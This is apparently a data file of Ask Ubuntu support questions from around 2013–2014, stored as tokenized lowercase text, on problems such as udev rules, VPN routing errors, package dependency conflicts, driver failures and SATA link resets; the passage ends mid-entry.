399263	udev rules seem ignored ; can not prevent modem manager from grabbing device	i am trying to prevent modem manager from running when i plug my cell phone into a usb port . i have tried to add a custom rule with udev , but my custom rules seem ignored . i created a file /etc/udev/rules.d/99-mm-usb-device-blacklist.rules which contains # lg phone attrs { idvendor } == '' 1004 '' , env { id_mm_device_ignore } = '' 1 '' and yet when i plug in the phone and check dmesg , this is what i get : [ 1809.761940 ] usb 3-1 : new high-speed usb device number 11 using xhci_hcd [ 1809.778662 ] usb 3-1 : new usb device found , idvendor=1004 , idproduct=61fc [ 1809.778670 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1809.778674 ] usb 3-1 : product : b project usb device [ 1809.778677 ] usb 3-1 : manufacturer : lg electronics . inc [ 1809.778680 ] usb 3-1 : serialnumber : xxxxxxxxxxxxxxxxx [ 1809.779501 ] cdc_acm 3-1:1.0 : this device can not do calls on its own . it is not a modem . [ 1809.779584 ] cdc_acm 3-1:1.0 : ttyacm0 : usb acm device [ 1809.780899 ] cdc_ether 3-1:1.3 usb0 : register 'cdc_ether ' at usb-0000:00:14.0-1 , cdc ethernet device , 6e:34:73:4f:68:4c [ 1809.781454 ] scsi8 : usb-storage 3-1:1.5 [ 1809.807331 ] ipv6 : addrconf ( netdev_up ) : usb0 : link is not ready [ 1809.816566 ] ipv6 : addrconf ( netdev_up ) : usb0 : link is not ready [ 1809.816759 ] ipv6 : addrconf ( netdev_up ) : usb0 : link is not ready i have also tried editing /lib/udev/rules.dev/77-mm-usb-device-blacklist.rules but this did not work either . what am i missing ? what would be a helpful step in debugging this ? update : running udevadm info -- export-db shows the udev rule is being updated . the relevant output is : p : /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.7 n : bus/usb/002/012 e : busnum=002 e : devname=/dev/bus/usb/002/012 e : devnum=012 e : devpath=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.7 e : devtype=usb_device e : driver=usb e : id_bus=usb e : id_mm_device_ignore=1 e : id_model=b_project_usb_device e : id_model_enc=b\x20project\x20usb\x20device e : id_model_id=61fc e : id_revision=0216 e : id_serial=lg_electronics._inc_b_project_usb_device_xxxxxxxxxxxxx e : id_serial_short=xxxxxxxxxxxx e : id_usb_interfaces=:020201:0a0000 : ffffff:020600:080650 : e : id_vendor=lg_electronics._inc e : id_vendor_enc=lg\x20electronics.\x20inc e : id_vendor_id=1004 e : major=189 e : minor=139 e : product=1004/61fc/216 e : subsystem=usb e : type=239/2/1 e : udev_log=7 e : usec_initialized=5987581808 so modem manager should be ignoring the device . and yet my computer keeps trying to initialize a network connect through my phone whenever i plug it to the usb port . is there another program that udev is launching ?
399267	how to upgrade glade 3.8 to glade 3.13 higher	my glade 3.8 my ubuntu 12.04 how ? i 'm newbier i 'm try but not working please , help me !
399273	how to get juniper 7 ( r4 ) working with ubuntu 13.04 ( 64 ) on chromebook ( crouton install ) ?	i 've been trying to get my company 's juniper vpn to work on my crouton install . i 'm running crouton on a c720 with ubuntu 13.04 . i was able to get past the jre issue ( not able to connect to juniper vpn on lubuntu 13.04 following the instructions from mario ) . however , i am now faced with another issue within juniper . the first time i tried to connect , the gui showed connect for about a couple of seconds , then it spit out a route monitor alarm error message . all subsequent connects are showing config error instead . i looked in the ncsvc.log file and found these entries : 20140102230734.37262 ncsvc [ p19538.t19538 ] rmon.info modifying the metric for a conflicting route to 0.0.0.0/0.0.0.0 gw 192.168.1.1 metric 10 ( routemon.cpp:838 ) 20140102230734.37299 ncsvc [ p19538.t19538 ] rmon.info adding a conflicting route with a lower metric to 0.0.0.0/0.0.0.0 gw 10.186.167.30 metric 1 ( routemon.cpp:862 ) 20140102230734.37322 ncsvc [ p19538.t19538 ] rmon.error failed to add route : dest 0.0.0.0 mask 0.0.0.0 , gw 10.186.167.30 dev ( null ) . error 101 , fd = 6 ( routemon.cpp:962 ) 20140102230734.37344 ncsvc [ p19538.t19538 ] rmon.info modifying the metric for a conflicting route to 192.168.1.0/255.255.255.0 gw 0.0.0.0 metric 10 ( routemon.cpp:838 ) 20140102230734.37368 ncsvc [ p19538.t19538 ] rmon.info adding a conflicting route with a lower metric to 192.168.1.0/255.255.255.0 gw 10.186.167.30 metric 1 ( routemon.cpp:862 ) 20140102230734.37388 ncsvc [ p19538.t19538 ] rmon.error failed to add route : dest 192.168.1.0 mask 255.255.255.0 , gw 10.186.167.30 dev ( null ) . error 101 , fd = 6 ( routemon.cpp:962 ) 20140102230734.37401 ncsvc [ p19538.t19538 ] rmon.info adding route to 0.0.0.0/0.0.0.0 with gw 10.186.167.30 , metric 1 , if_id 0 ( routemon.cpp:873 ) 20140102230734.37419 ncsvc [ p19538.t19538 ] rmon.error failed to add route : dest 0.0.0.0 mask 0.0.0.0 , gw 10.186.167.30 dev ( null ) . error 101 , fd = 6 ( routemon.cpp:962 ) 20140102230734.37430 ncsvc [ p19538.t19538 ] session.error error in handling config ! ( session.cpp:1070 ) 20140102230734.37440 ncsvc [ p19538.t19538 ] session.info disconnecting from ive remoteny.timeinc.com with reason 4 ( session.cpp:486 ) is there any reason why ncsvc is not able to add route ? i am seeing something interesting as well . when i run ncdiag it is telling me nc installation check failed . how do i go about debugging this ? thanks for any help !
399274	unable to install ubuntu-13.10-desktop-amd64.iso in virtualbox	i 'm using virtualbox-4.3.6-91406-win on windows 7 x64 with an amd 64-bit processor . the virtualbox installation is also a 64-bit install . i 've been able to install win server 2008 . when i try to install ubuntu-13.10-desktop-amd64.iso in virtualbox , i get this msg : this kernel requires an x86-64 cpu , nut only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . i 'm using an amd phenom ii x2 555 processor . it sounds like the .iso file may be corrupt ? any ideas/thoughts would be greatly appreciated . thanks
399276	what are this updates ?	i am new to ubuntu ... i recently install ubuntu 13.10. , after installing ubuntu , i got a notification that update are available.the notification come from software updater app , i got 2 updates , one is come yesterday and other one come today , i update the first update , after i got another update today , i wait and post this question.. are this updates send by ubuntu ? are this updates are software ( apps ) updates ? is it safe to update ?
399277	how to enable unity launcher on startup ?	my ubuntu 12.04 lts laptop has the unity 2d along with the classic gnome interface but it would n't launch automatically on startup , only after i type 'unity ' on the terminal the unity 2d launcher as well as the dash board starts launching . how do i make the unity launcher show on startup itself without opening the terminal and typing 'unity ' ?
399285	wifi not working since router upgrade	my ubuntu has worked well for about a year now but i have recently updated my internet package and with it got a new router . since the new router i have been unable to connect to wifi but cable is fine . it sees the connection and try , s to connect but keeps disconnecting . my windows connect to it straight away just ubuntu giving me problems any help gratefully received as cable not a good thing for laptop
399288	`` qtcreator-plugin-ubuntu-cordova but it is not going to be installed '' while installing ubuntu-sdk package	i tried the : sudo apt-get install ubuntu-sdk and this resulted in the following error . depends : qtcreator-plugin-ubuntu-cordova but it is not going to be installed e : unable to correct problems , you have held broken packages . which too depended on a package or two , so i tried installing the dependencies manuallly ... succeeded with the first few , but after doing so , i again tried installng the sdk , , and got the following error : the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu-cordova but it is not going to be installed so i tried : sudo apt-get install qtcreator-plugin-ubuntu-cordova but this resulted in : the following packages have unmet dependencies : qtcreator-plugin-ubuntu-cordova : depends : qtcreator-plugin-ubuntu ( = 2.8.1bzr56raring0 ) but 2.8.1.1bzr65raring0 is to be installed so , what to do ?
399291	what is the specific version of realtek sound card does my samsung np305e5a have	i have a samsung laptop np305e5a-a03us , and i can not seem to find the specific version of my sound card . all i see is that it is a realtek hd audio , but which realtek is it ?
399292	problem with extracting .tgz file	i downloaded a big data file ( others.tgz , some 30gb ) from an ftp site . i did tar -zxvf others.tgz some files were extracted ( four files , where it is supposed to have 6 files ) after that it came out throwing the error , gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : unexpected eof in archive tar : error is not recoverable : exiting now any suggestions please .
399293	can not install ubuntu sdk on ubuntu 13.10	i am setting up a development environment on ubuntu 13.10 for developing html5 app for ubuntu . i used the following command to install the ubuntu sdk sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk then i found that qtcreator/ubuntu sdk installed in ubuntu.also i can create a html5 tabbed touch ui project in ubuntu sdk . but when i try to run this project from build- > run it is giving me following error starting ubuntu-html5-app-launcher -- www=/home/hitech/testapp failed to start program . path or permissions wrong ? ubuntu-html5-app-launcher exited with code -1 where testapp is my project name . i searched on askubuntu.com but not found exactly what is creating a issue . somewhere i found that dependency of qtcreator and qtcreator-plugin-ubuntu are broken so i tried to install all the component of qtcreator manually . i am using synaptic package manager to manage the packages . in that i install the packaged in following sequence 1 ) qtcreator - 2.8.1-0ubuntu1~saucy1~test6 2 ) qtcreator-plugin-ubuntu - 2.8.1.1bzr65saucy0 3 ) qtcreator-plugin-ubuntu-common - 2.8.1.1bzr65saucy0 after that i tried to install qtcreator-plugin-ubuntu-cordova but it 's dependency is not satisfied and giving me following error qtcreator-plugin-ubuntu-cordova : depends : qtcreator-plugin-ubuntu ( = 2.8.1bzr56saucy0 ) but 2.8.1.1bzr65saucy0 is to be installed can you please help to resolve this issue ? i also tried the same installation in ubuntu ubuntu 12.04 lts but the result is same there . note : this is not a problem of unmet dependency , it is a bug in ubuntu sdk installation that qtcreator-plugin-ubuntu only having one version 2.8.1.1bzr65saucy0 while the qtcreator-plugin-ubuntu-cordova is depends on 2.8.1bzr56saucy0 version . the installation of ubuntu-sdk is not resolving all dependency as it can not install
399295	how to remove the lock automatically after pressing ctrl+z ?	for some reason we terminate the installation of package via apt-get by pressing ctrl+z , it creates a lock file inside /var/lib/dpkg/ and /var/cache/apt/archives/ directories . and after that if we want to install another or same package via apt-get , we have to manually remove the lock by running these two commands sudo rm /var/lib/dpkg/lock and sudo rm /var/cache/apt/archives/lock so that the installation will occurs . my question : is there any way to remove the lock files automatically that was created after pressing ctrl+z , so that we do n't need to remove the lock files manually .
399298	ubuntu alongside win8 lots of drives	recently i 've installed ubuntu 12.04 alongside win 8 on my laptop , lenovo z510 . i tried several time and had some problems with win boot , grub , etc . after few attepts , now apparently both oss are working . but when i look at file systems , there is a list of drives and i do not know where is my home directory of ubuntu : /dev/sda11 / /dev/sda2 /boot/efi /dev/sda8 /media/06caf922-1c9d ... /dev/sda9 /media/fade21 ... /dev/sda6 /media/lenovo /dev/sda3 /media/lrs_esp /dev/sda6 /media/pbr_drv /dev/sda6 /media/windows8_os /dev/sda6 /media/winre_drv i do not understand these drive partitions . any thoughts ?
399309	how do i edit .mp3 metadata ? ( fairly certain im using that correctly )	how do i change the metadata of mp3 files ? ive downloaded an album and clementine is thinking that disk 1 is the same as disk 2 . i would like to straighten that out by editing the album name of all the songs on the album to each individual disk . click on file > properties > audio i want to edit the stuff in there . any idea ?
399311	compiling in ubuntu 12.10 arm 7	i am fairly lost in compiling drivers ( modules ) for ubuntu from here these drivers work on the older 3.0.36 kernel so i would like to compile it for 3.0.8 by using the driver source provided . i have checked online and read that i use the ./configure file , but when i try it , it does not work . any help will be appreciated
399313	how to make .bin file from multiple c source code	hi please let me know how to compile sony tv source code using ubuntu 13.10 for making .bin file ( system software ) .
399314	printer working problem epson aculaser m1400 for ubntu linux	the printer epson aculaser m1400 not working in ubtuntu linux 12.04. how can it words properly . please help
399315	how do you remap keys on ubuntu ? specifically the 'n ' key to 'right alt ' key	i have a dell xps l502x and a broken n key . i have ubuntu installed besides windows 7 . i need help in remapping my n key to my right alt key . i have used keytweak for remapping in windows but i could n't find no such utility for ubuntu . as i am very unfamiliar with the workings of ubuntu , a detailed step by step guide would be immensely helpful . p.s : the xev command does not work as i ca n't find the keycode for the key ... its broken !
399324	shared passwords	i am looking for a password program that i can use with my partner . we have to create a lot of shared passwords , and it is difficult to do that with conventional programs like keepassx or password safe . anybody have any suggestions ?
399326	can not find -lslink	while running make for a program installation on ubuntu 12.04 lts , i was stuck with the following error : could anyone help explain the cause and solution please ? i 'm a rookie please ... thanks /usr/bin/ld : skipping incompatible /home/user/dinver_3/geopsypack-57items-src-2.5.0/lib/libslink.a when searching for -lslink /usr/bin/ld : can not find -lslink collect2 : ld returned 1 exit status make [ 2 ] : *** [ ../bin/geopsy ] error 1 make [ 2 ] : leaving directory `/home/user/dinver_3/geopsypack-57items-src-2.5.0/geopsy' make [ 1 ] : *** [ release ] error 2 make [ 1 ] : leaving directory `/home/user/dinver_3/geopsypack-57items-src-2.5.0/geopsy' make : *** [ sub-geopsy-make_default-ordered ] error 2
399328	setting up mail on ununtu vps ?	ok , so after googling around left and right , as well as reading up on all the guides on the ubuntu forums and official documentation , i am officially confused . what is the optimal approach to installing a mail server ? i have a domain name that i 'll call example.com . i 've set up a subdomain at mail.example.com to act as the mail server , as well as the webmail apache host . i have a reverse dns/ptr record as well as an spf record set up . i also have an ssl cert from a verified ca pointed to mail.example.com . i only need imap/s access on this system , and i hear postfix/dovecot is the software to use . i plan to use roundcube for webmail . what is the best way , ( i 'm confused by all the different ways there are to do this ) to get the server installed , set up , configured properly , and secured so that it can send/receive from example.com from the mail.example.com server ? thanks vps runs ubuntu 12.04.3 lts
399329	consuming more memory instead of require ?	i had install ubuntu 64 bit on my system ( ubuntu 12.04 lts ) . when i do free -m total used free shared buffers cached mem : 5859 5284 574 0 251 4012 -/+ buffers/cache : 1021 4838 swap : 6032 0 6032 i have total 6gb of ram , now even i had just one application in used it show me 5284 are totally used , only 574 mb of memory is free . what to do to resolved it or to debug it ? also when i fire top command , it show only few application running as in my system , but occupied memory are very much ?
399330	usb mouse stops working every several seconds 13.10	i installed ubuntu 13.10 and have now problem with usb mouse . it stops working every 10 - 20 seconds ( just freezes and stops responding , i could n't move it or click somewhere ) . but scroll is working ok . i have to use scroll and it start working . touchpad is working well all the time . i tried to connect another mouse : same result . changing usb port : same result . loaded into windows : mouse working normally . this is output for lsusb : bus 002 device 009 : id 09da:000a a4 tech co. , ltd optical mouse opto 510d bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0489 : e03c foxconn / hon hai bus 001 device 003 : id 1bcf:288a sunplus innovation technology inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
399331	i ca n't start apache2 after updating ubuntu 12.04	i ca n't start apache2 after updating ubuntu 12.04 and take this error / usr/lib/apache2/modules/mod_dav_svn.so : undefined symbol : svn_error_purge_tracing how can i solve this ?
399332	how to add ubuntu 13.04 to a domain	i have just installed ubuntu 13.04 and having issues joining it tot he domain of my office , so i can not seem to remote , access applications , access the file directory , exchange . how can i achieve this ?
399335	what 's slowing ubuntu loading ?	i 've read enough similar topics but i think i need more guidance . i run 12.04 on a dell desktop with i3 sandy bridge cpu and 4gb ram which came with 11.something version . ( just pointing that is a fully linux compatible system ) i 've installed several packages in the past of which most i do n't remember anymore . thing is that recently system has become more and more slow and i ca n't find out why . i check logs and startup messages but those are all arcane to me . i use this system as a web/print server and fax receiving/editing . i have uninstalled wine and vmware player but still nothing changed . besides some programming/server packages , openoffice and teamviewer i have n't install much . is there a procedure i can follow to track down what is slowing my computer ?
399336	problem configuring bind9	i 'm trying to configure dns in my local network in ubuntu 13 but i get error : zone autun.hom/in : loading from master file /etc/bind/zones/db.autun.hom failed : no owner please assist , i appreciate for your time
399340	security measures for thunderbird and pidgin	i want to install thunderbird and pidgin . is it safe to give passwords in these applications . please tell me what security measures should be taken while using these kinds of applications .
399341	tron theme for gnome-session-fallback	i have ubuntu 13.10 and i installed gnome-session-fallback ( classic gnome ) . i really want the tron theme , but there is a certain theme that i have to download for my desktop environment . can you guys help me out ? i am really lost with what i am supposed to download and also installing the theme . thanks
399342	startup disk creator wont let me pick my iso file	ive recently upgraded to 13.10 and its just not for me , so what i want to do is downgrade back to 12.04 ( which i know works perfect for me ) . i downloaded my 12.04 amd iso but alas , it wont let me pick my iso file , usually the iso is already set , as a matter of fact . it just shows an empty bar . im not sure what to do . semi-novice .
399344	where can i followup with my system test results ?	i ran the by-default-installed `` system testing '' tool and submitted the results but i do n't know where can i followup with it on launchpad ? i ca n't remember exactly if i submitted it while having an active launchpad account , but now i do , should i run it again ?
399345	eclipse error message	when i installed eclipse and ran it , i got this error message : an error has occurred . see the log file /home/bensalem/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1388736884438.log . where bensalem is the user , and this destination of the log file , i did n't get it at all . please help .
399351	linux anti-virus	does linux need anti-virus ? i searched & some sites are providing free antivirus for ubuntu and linux . when does it needs anti-virus ?
399353	is over-provisioning of an ssd possible with dual-boot ?	i have a few machines i 'd want to dual boot different oss with but also maximise the lifetime of the ssd fitted to them . i am aware that over-provisioning can help maximise the life of the ssd as it provides space for the ssd to conduct its internal housekeeping . what is over-provisioning in terms of what space is reserved on the ssd ? is it just creating another ( physical type ) standard partition ? and is it possible to also setup a partitioned dual boot a machine ( using the standard procedure ) using an over-provisioned ssd ? example setup : a lenovo x201s thinkpad with 256gb samsung 840 pro ssd i fitted myself . this machine is currently single boot windows 8 pro 64bit and i intend to dual boot it with ubuntu 12.04 lts , say w8 : 128gb ubuntu : 32gb and a 64gb shared partition . assuming that over-provisioning is creating a partition , or at least , just allocating unreserved space , then presumably i should have at least 3 physical type partitions available to support dual boot . ( 4 physical partitions is supported by a standard boot-loader , though a partition can contain multiple logical partitions ) . thoughts ?
399357	what does the `` nice '' value mean in cpu utilization statistics	i am relatively new to linux and ubuntu . i have attached the system monitor to the bar ( the upper bar of the screen ) and opened the preference to configure this gadget . on the processor tab i see that i can mark the choose 5 colors : user , system , nice , iowait and idle . i can understand all 4 ( i think ... ) except for `` nice '' . what is this `` nice '' ? i read this answer and i understand that the superuser can perform tasks with greater priority but , what does it mean if i see it in the system monitor without me running any new nice processes ?
399361	what does mbr 2fa mean ?	in the boot menu i 'm trying to get to the recovery screen up by pressing the left shift key after the bios but i ca n't get it to work . the screen just says mbr 2fa and mbr 1234f . if i press a no recovery menu shows up .
399367	manually set multimedia key press receiver in mate 1.6	suppose i fire up an application that globally interecepts my multimedia key pressess , for example a vlc instance that responds to the multimedia play button . if i then open up another application that does this , for example banshee , it takes over as the multimedia key receiver . when i close the new receiver app , however , the previous receiver ( i.e. , vlc in my example ) is not restored , and further multimedia key presses are not caught by any app anymore . is there a way to externally set an app as the receiver of multimedia key presses in mate 1.6 ? i would like to restore a previous receiver or just be able to change , on the fly , which app receives my multimedia key presses , without having to close and reopen my apps .
399372	hostcc scripts/basic/fixdep gcc : error trying to exec 'cc1 ' : execvp : no such file or directory	hardik @ ubuntu : ~/ti-sdk-beagleboard-05.07.00.00/board-support/linux-3.3.7 $ make arch=arm cross_compile=arm-none-linux-gnueabi- uimage hostcc scripts/basic/fixdep gcc : error trying to exec 'cc1 ' : execvp : no such file or directory make [ 2 ] : *** [ scripts/basic/fixdep ] error 1 make [ 1 ] : *** [ scripts_basic ] error 2 make : *** no rule to make target `include/config/auto.conf ' , needed by `include/config/kernel.release ' . stop .
399376	can not install or update through terminal get this error ( in the body of question )	everything was working fine but now every-time i run sudo apt-get install ( program ) or even sudo apt-get update i get this message : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . what must i do to fix this ? i am running ubuntu 13.10 32-bit
399377	ltsp is not working for my senario	i have one hp server which i want use as a ltsp server.however i have windows ad service with dhcp in the same network.how can i setup above server as a ltsp server.i tried documents and queries available on internet . but my clients are getting an ip address and stucking for tftp search.can we have step by step latest bugfree documentation .
399382	juju local failed with /var/run/dbus/system_bus_socket : no such file or directory	i am following steps from juju startup with lcx . at first step of juju bootstrap it gives error as : error juju.provider.local environ.go:435 could not install mongo service : exec [ `` start '' `` -- system '' `` juju-db-xxxx-local '' ] : exit status 1 ( start : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory ) mongo db service as such works fine no errors also command which is trying to run is executing successfully service juju-db-xxxxx-local start juju-db-xxxxx-local start/running , process 8734 thanks ,
399386	after updating ubuntu 12.04 ... no boot is detected	i have been using ubuntu 12.04 alongside windows 8 for 6 months . i installed all the updates available and now when i try to boot up , it says no boot found press any key to reboot.i did not see what updates were there . it was more than 300mb . i have dell inspiron 15r laptop which came pre-installed with windows 8 . i tried to use boot-repair with recommended settings , it just stays at `` enabling bootinfo '' for more than 45 mins . and now it also not detecting the battery .
399387	i have a problem with install ubuntu ( laptop hp )	i have a problem with install ubuntu 13.10 , 12.04 on the laptop hp pavilion dv6000 . i think that problem with vedeocard , nvidia gforce 750m . photo :
399388	installing ubuntu 13.04 on hp pavilion g4 laptop	i 'm trying to install ubuntu 13.04 on my hp pavilion g4 laptop ( intel core i3 , 2gb ram , nvidia geforce 610m with 1gb built-in memory ) , but i ca n't install it . first i booted from the dvd drive and choose language , and then my laptop screen went black . i waited for a long time , but it 's still just a black screen . how to install ubuntu on my laptop ? is ubuntu 13.04 compatible with my laptop ?
399389	aptdaemon simulation not updating dependencies	i started playing with aptdaemon on ubuntu 13.10 recently , and i 'm baffled . calling simulate ( ) on a transaction does n't update the dependencies list . debug from aptd shows that several events are being emitted , including a propertychanged event for dependencies , but my handler is not called . here 's some code that demonstrates the problem : import aptdaemon.client def printcall ( *args , **kwargs ) : print ( `` call ( * % r , ** % r ) '' % ( args , kwargs ) ) client = aptdaemon.client.aptclient ( ) # i have make installed , but not abiword . txn = client.install_packages ( [ `` make '' , `` abiword '' ] ) txn.connect ( `` dependencies-changed '' , printcall ) txn.simulate ( ) print ( txn.dependencies ) print ( txn.packages ) for me , it prints an empty dependencies list ( actually , a single list containing 6 empty lists ) , whereas running apt-get install abiword from the command-line comes up with several dependencies . also , the dependencies-changed event is never fired : dbus.struct ( ( dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) ) , signature=none , variant_level=1 ) dbus.struct ( ( dbus.array ( [ dbus.string ( u'make ' ) , dbus.string ( u'abiword ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) ) , signature=none , variant_level=1 ) is this a bug , or am i missing something ( like an event loop ) ? ďťż
399397	teamviewerd not starting with lightdm on 13.10	i 've installed the upstart-job for teamviewer 9 . according to the config it should start when dbus and lightdm is running , see : start on ( ( started dbus or started init-system-dbus ) and ( starting-dm or started gdm or started kdm or started lightdm or started lxdm or started prefdm or started xdm ) ) as you can see , both are started here on my ubuntu 13.10 but teamviewerd does not start automatically : root @ surf : ~ # initctl list |grep dbus dbus start/running , process 807 root @ surf : ~ # initctl list |grep lightdm lightdm start/running , process 2336 root @ surf : ~ # initctl list |grep teamviewerd teamviewerd stop/waiting in the log i get ( after a reboot ) : root @ surf : ~ # cat /var/log/upstart/teamviewerd.log method return sender=org.freedesktop.dbus - > dest=:1.6 reply_serial=2 uint32 1 if i start it manually it works as expected : root @ surf : ~ # initctl start teamviewerd teamviewerd start/running , process 13796 what is wrong with this job ?
399398	logrotate throws a squid4 error	i am using squid3 , on my ubuntu 12.10 server , for some months now . i never had problems like that until 4 days ago . since then i get this mail every day : > topic : cron : test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) > /etc/cron.daily/logrotate : > 2014/01/03 06:25:04| error : auth_param digest program /usr/lib/squid4/digest_pw_auth : ( 2 ) no such file or directory of course logrotate ca n't find /usr/lib/squid4/digest_pw_auth because it does n't exist . as i said , iâm using squid3 , not squid4 . squid4 does n't exist at all , the latest version from the website is 3.3 . so the correct path would be /usr/lib/squid3/digest_pw_auth . i looked inside logrotate , but i ca n't find anything related to this error message . what has logrotate to do with the digest_pw_auth file anyway ? what can i do to fix this ?
399404	ubuntu 13.10 - how to apply kernel patch ?	in ubuntu how can i change this modifications safely ? one manufacturer given me the patch to apply . `` faulty usb2 cameras on usb3 linux systems . patch '' -- - linux/drivers/usb/core/hub.c.orig 2013-12-23 22:09:50.545093470 -0500 +++ linux/drivers/usb/core/hub.c 2013-12-23 22:29:40.521043702 -0500 @ @ -4197,7 +4197,19 @ @ hub_port_init ( struct usb_hub *hub , stru break ; } - retval = usb_get_device_descriptor ( udev , 8 ) ; + if ( ! use_new_scheme ( retry_counter ) ) + retval = usb_get_device_descriptor ( udev , 8 ) ; + else + retval = usb_get_device_descriptor ( udev , + sizeof ( struct + usb_device_descriptor ) ) ; if ( retval < 8 ) { if ( retval ! = -enodev ) dev_err ( & udev- > dev ,
399408	gdm autologin not working..	i removed lightdm since i was not able to login as it was booting to a blank screen . hence i installed gdm and everything was fine . now when i try to use the autologin option through gui interface and also by editing the /etc/gdm/custom.conf automaticloginenable=true automaticlogin= autologin fails in gdm also . it goes into a black screen . can anyone help me out on how to reset lightdm to ubuntu defaults..and autologin ? btw i tried sudo dpkg-reconfigure lightdm etc ... commands
399409	no internet , brightness controls , battery stats toshiba satellite on linux 13.10	i have a toshiba satellite t135 and i installed ubuntu 3.10 on to it . it installed just fine and everything is great , except that it seems most of the hardware built into the laptop does n't work properly . i 'm guessing that i have some drivers missing or something but being new to linux do n't know how to download them without an internet connection on that computer . the wifi shows the different wifi connections near me , but they all display a one bar connection ( despite my home wifi normally having full bars ) when i try to connect to any connection it just fails . i also am unable to adjust the brightness , and the battery displays `` no battery present '' , but when i unplug it it stays on . i was wondering how i would go about getting all the necessary drivers onto a flash drive and the process i would go through to install them , or whatever i would need to do . help would be much appreciated . thanks . if someone need additional detail in order to help i would be happy to provide .
399410	nvidia driver 331 recent update breaks ubuntu 13.10	i just recovered from nvidia driver failure after an update was pushed a few hours ago from xedger ppa . there is not much insight from what i can search from the web . currently , my system is running on nouveau but this means a no-go for steam games ... .. my gpu is gtx 650 ti i 'm still fairly new to linux and i 'm not sure what is the next step . any suggestions ? should i wait for some time before trying to install it again ?
399412	deleted ubuntu partition , grub rescue	i had a system with a dual boot of windows 8.1 and ubuntu 13 . i deleted the ubuntu partition in disk management in windows , and then this problem occurred . my problem is that i ca n't access or boot from cd or usb , which i think is because of windows 8.1 . do you have any tips on how to fix it ?
399421	ubuntu 12.04 stuck at purple screen	recently downloaded ubuntu 12.04 from ubuntu site installed correctly but after installation pressing restart now lead me to purple screen and hangs there for hours samsung np355v5c laptop amd radeon graphics 7670 + 7270 6gb ram any help is appreciated
399424	ga-h87-d3h ( bios f5 ) und intel ( r ) pro/1000 pt dual port - > sata iii hard link reset / link speed drop	it looks like , that ga-h87-d3h and intel ( r ) pro/1000 pt dual port are causing sata iii hard link resets / link speed drops . [ 5939.483243 ] ata1 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483251 ] ata1 : irq_stat 0x00400040 , connection status changed [ 5939.483258 ] ata1 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483266 ] ata1 : hard resetting link configuration : mainboard : ga-h87-d3h ( bios f5 ) cpu : intel ( r ) xeon ( r ) cpu e3-1240 v3 @ 3.40ghz ram : 32 gb , ( 4x crucial ballistix sport dimm 8gb , ddr3-1600 , cl9-9-9-24 ) gpu : sapphire ultimate radeon hd 7750 ( pcie 1 , auto / gen3 / gen2 ) storage : ssd1 ata.1 crucial m4-ct512m4ssd2 ( sata 6 gb/s capability ) ssd2 ata.2 samsung 840 ( sata 6 gb/s capability ) ssd3 ata.3 samsung 840 ( sata 6 gb/s capability ) hdd1 ata.4 wdc wd30efrx-68a ( sata 6 gb/s capability ) hdd2 ata.5 wdc wd10efrx-68j ( sata 6 gb/s capability ) dvd ata.6 dvdram gh22ns50 network : on-board intel ( r ) pro/1000 pt dual port ( pcie 2 , x4 ) ( network with bonding ( lacp ) to 3 gb/s ) ( problem occurs also with on-board network card only and installed intel network card ( no ips configured / disabled ) ) os : ubuntu 13.10 , linux mint 16 , fedora 20 ( windows 7 64bit ( no teaming ) ) problem can be reproduced with just one ssd or hd . ssds work fine at 6 gb/s installed in asus g75vw notebook ( no link down/up or speed drops ) . link down/up do n't depend on io , even can be seen when booting from live-cd or usb-stick . problem occures even when dvd is not installed it looks like problem disappears when intel network card is removed from computer . ( slot pciex4 , bios x4 setting ) ( system under observation ) boot - messages ... [ 0.692786 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x3f impl sata mode [ 0.731171 ] ata1 : sata max udma/133 abar m2048 @ 0xf0236000 port 0xf0236100 irq 45 [ 0.731172 ] ata2 : sata max udma/133 abar m2048 @ 0xf0236000 port 0xf0236180 irq 45 [ 0.731173 ] ata3 : sata max udma/133 abar m2048 @ 0xf0236000 port 0xf0236200 irq 45 [ 0.731175 ] ata4 : sata max udma/133 abar m2048 @ 0xf0236000 port 0xf0236280 irq 45 [ 0.731176 ] ata5 : sata max udma/133 abar m2048 @ 0xf0236000 port 0xf0236300 irq 45 [ 0.731177 ] ata6 : sata max udma/133 abar m2048 @ 0xf0236000 port 0xf0236380 irq 45 [ 1.050805 ] ata3 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 1.050819 ] ata4 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 1.050832 ] ata1 : sata link up 3.0 